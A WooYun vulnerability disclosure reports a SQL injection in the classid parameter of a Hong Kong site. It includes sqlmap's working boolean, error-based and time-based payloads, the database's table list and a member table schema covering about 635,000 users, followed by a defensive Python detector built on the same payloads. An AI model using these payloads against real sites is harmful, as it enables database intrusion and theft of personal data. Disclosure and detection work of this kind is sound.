Vulnerability Summary

Defect ID: wooyun-2016-0176962

Title: SQL injection on the 財富聯盟 official website / 630,000+ user records (Hong Kong region)

Affected vendor: 財富聯盟

Author: 路人甲

Submitted: 2016-02-19 16:25

Fix time: 2016-02-24 16:30

Disclosed: 2016-02-24 16:30

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Referred to a third-party partner organisation (HKCERT, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2016-02-19: Details sent to the vendor; awaiting vendor response
2016-02-24: Vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

...

Detailed description:

http://**.**.**.**/index.php?app=search&vip=1&act=seller&classid=435&type=img
The classid parameter is injectable.


Database: aajflm
+------------+---------+
| Table | Entries |
+------------+---------+
| ecm_member | 635469 |
+------------+---------+

Proof of vulnerability:

sqlmap identified the following injection point(s) with a total of 591 HTTP(s) requests:
---
Parameter: classid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: app=search&vip=1&act=seller&classid=435 RLIKE (SELECT (CASE WHEN (4931=4931) THEN 435 ELSE 0x28 END))&type=img
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(9228=9228,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=img
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT * FROM (SELECT(SLEEP(5)))JkXe)&type=img
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'o2oxx@localhost'
current database: 'aajflm'
current user is DBA: False
available databases [2]:
[*] aajflm
[*] information_schema
Database: aajflm
[107 tables]
+--------------------------+
| ecm_acategory |
| ecm_address |
| ecm_article |
| ecm_attribute |
| ecm_bankcard |
| ecm_bankcard_record |
| ecm_brand |
| ecm_bvlog |
| ecm_cart |
| ecm_category_goods |
| ecm_category_store |
| ecm_cflog |
| ecm_collect |
| ecm_comment |
| ecm_consumption_code |
| ecm_coupon |
| ecm_coupon_sn |
| ecm_exchange |
| ecm_financial |
| ecm_financial_records |
| ecm_financial_records_ls |
| ecm_friend |
| ecm_function |
| ecm_gcategory |
| ecm_goods |
| ecm_goods_adv |
| ecm_goods_attr |
| ecm_goods_cart |
| ecm_goods_image |
| ecm_goods_order |
| ecm_goods_qa |
| ecm_goods_spec |
| ecm_goods_spec_images |
| ecm_goods_statistics |
| ecm_groupbuy |
| ecm_groupbuy_log |
| ecm_incomebrand |
| ecm_incomelog |
| ecm_incomeshop |
| ecm_jflog |
| ecm_jfrestrictlog |
| ecm_jy_income |
| ecm_ka_cart |
| ecm_ka_order |
| ecm_ka_order_goods |
| ecm_lottery |
| ecm_mail_queue |
| ecm_mcc |
| ecm_member |
| ecm_member_account |
| ecm_member_examrank |
| ecm_message |
| ecm_module |
| ecm_myarea |
| ecm_mycity |
| ecm_myprovince |
| ecm_navigation |
| ecm_order |
| ecm_order_extm |
| ecm_order_goods |
| ecm_order_log |
| ecm_pageview |
| ecm_partner |
| ecm_payment |
| ecm_pos_records |
| ecm_pos_shop |
| ecm_poslog |
| ecm_posmember |
| ecm_poss |
| ecm_postal |
| ecm_privilege |
| ecm_pro_bvrecord |
| ecm_proposal |
| ecm_recommend |
| ecm_recommended_goods |
| ecm_region |
| ecm_sales |
| ecm_scategory |
| ecm_scope |
| ecm_sessions |
| ecm_sessions_data |
| ecm_sgrade |
| ecm_shipping |
| ecm_shop |
| ecm_shop_10yuan |
| ecm_shop_change_log |
| ecm_shop_goods |
| ecm_shop_ka |
| ecm_shop_member |
| ecm_shoptype |
| ecm_shopujf |
| ecm_spreader_member |
| ecm_store |
| ecm_tmpuser |
| ecm_ukinds |
| ecm_uploaded_file |
| ecm_user_cf |
| ecm_user_change_log |
| ecm_user_coupon |
| ecm_user_priv |
| ecm_user_project |
| ecm_wealthbean |
| ecm_withdrawals |
| ecm_yqf_data |
| ecm_zsjflog |
| sj_level |
| sj_member |
+--------------------------+
Database: aajflm
Table: ecm_member
[43 columns]
+-----------------+---------------------+
| Column | Type |
+-----------------+---------------------+
| level | int(11) |
| activation | varchar(60) |
| agreeprot | tinyint(1) |
| birthday | date |
| cncode | varchar(25) |
| dcncode | varchar(25) |
| dlevel | int(11) |
| double_count | decimal(10,2) |
| double_overtime | varchar(30) |
| double_status | int(10) |
| email | varchar(60) |
| examrankid | int(11) |
| feed_config | text |
| fgtimes | int(11) |
| gender | tinyint(3) unsigned |
| im_aliww | varchar(60) |
| im_msn | varchar(60) |
| im_qq | varchar(60) |
| im_skype | varchar(60) |
| im_yahoo | varchar(60) |
| isblack | tinyint(4) |
| isshop | int(11) |
| last_ip | varchar(15) |
| last_login | int(10) unsigned |
| lgtimes | int(11) |
| logins | int(10) unsigned |
| ngtimes | int(11) |
| openshop | int(11) |
| outer_id | int(10) unsigned |
| password | varchar(32) |
| phone_mob | varchar(60) |
| phone_tel | varchar(60) |
| portrait | varchar(255) |
| qxsh | tinyint(1) |
| real_name | varchar(60) |
| reg_time | int(10) unsigned |
| shopid | int(11) |
| shopnum | int(11) |
| tmpshopnum | int(11) |
| tpassword | varchar(32) |
| ugrade | tinyint(3) unsigned |
| user_id | int(10) unsigned |
| user_name | varchar(60) |
+-----------------+---------------------+

Fix recommendation:

Filter the parameter and use parameterized queries.
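Detection logic for the three techniques sqlmap reported above, written from the defender's side; this is an added example, not code from the original report or the affected site. It parses constructed request paths (the sample paths, and the assumption that classid and vip are numeric ids, are mine), applies the integer check the fix recommendation relies on, and names which technique a non-numeric classid value resembles: the RLIKE/CASE WHEN boolean probe, the FLOOR(RAND(0)*2) ... GROUP BY error trigger, or SLEEP().

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request paths (not log lines from the original report). The
# second to fourth entries reuse the payload shapes of the three sqlmap techniques.
SAMPLE_REQUESTS = [
    "/index.php?app=search&vip=1&act=seller&classid=435&type=img",
    "/index.php?app=search&act=seller&classid=435%20RLIKE%20(SELECT%20(CASE%20WHEN"
    "%20(4931%3D4931)%20THEN%20435%20ELSE%200x28%20END))&type=img",
    "/index.php?app=search&act=seller&classid=435%20AND%20(SELECT%209228%20FROM(SELECT"
    "%20COUNT(*),CONCAT(0x716a706b71,(SELECT%20(ELT(9228%3D9228,1))),0x716a717671,"
    "FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&type=img",
    "/index.php?app=search&act=seller&classid=435%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))JkXe)&type=img",
    "/index.php?app=search&act=seller&classid=12abc&type=img",
]

# Assumed: these query parameters are numeric ids in the application.
INTEGER_PARAMS = {"classid", "vip"}

# Signatures for the three techniques sqlmap reported, matched on the decoded value.
SIGNATURES = [
    ("boolean-based blind (RLIKE / CASE WHEN)",
     re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I | re.S)),
    ("error-based (FLOOR(RAND(0)*2) ... GROUP BY)",
     re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S)),
    ("time-based blind (SLEEP)", re.compile(r"\bSLEEP\s*\(", re.I)),
]


def inspect_request(path: str) -> list[str]:
    """Return findings for one request path; an empty list means it looks clean."""
    findings: list[str] = []
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name in sorted(INTEGER_PARAMS & params.keys()):
        for value in params[name]:
            # The type check the fix relies on: a numeric id must be digits only.
            if not re.fullmatch(r"[0-9]+", value):
                findings.append(f"{name}: non-integer value {value!r}")
            # Then name the technique the stray value resembles, if any.
            for label, pattern in SIGNATURES:
                if pattern.search(value):
                    findings.append(f"{name}: {label}")
    return findings


def scan(paths: list[str]) -> list[tuple[str, list[str]]]:
    """Keep only the requests that produced at least one finding."""
    return [(p, f) for p in paths if (f := inspect_request(p))]
```

The integer check alone already catches every payload on this page; the signature labels only tell the analyst which sqlmap technique was in use, which is useful when correlating with slow responses (SLEEP) or MySQL duplicate-key errors (the GROUP BY trigger) in application logs.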

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2016-02-24 16:30

Vendor reply:

Vulnerability rank: 15 (WooYun assessment)

Latest status:

None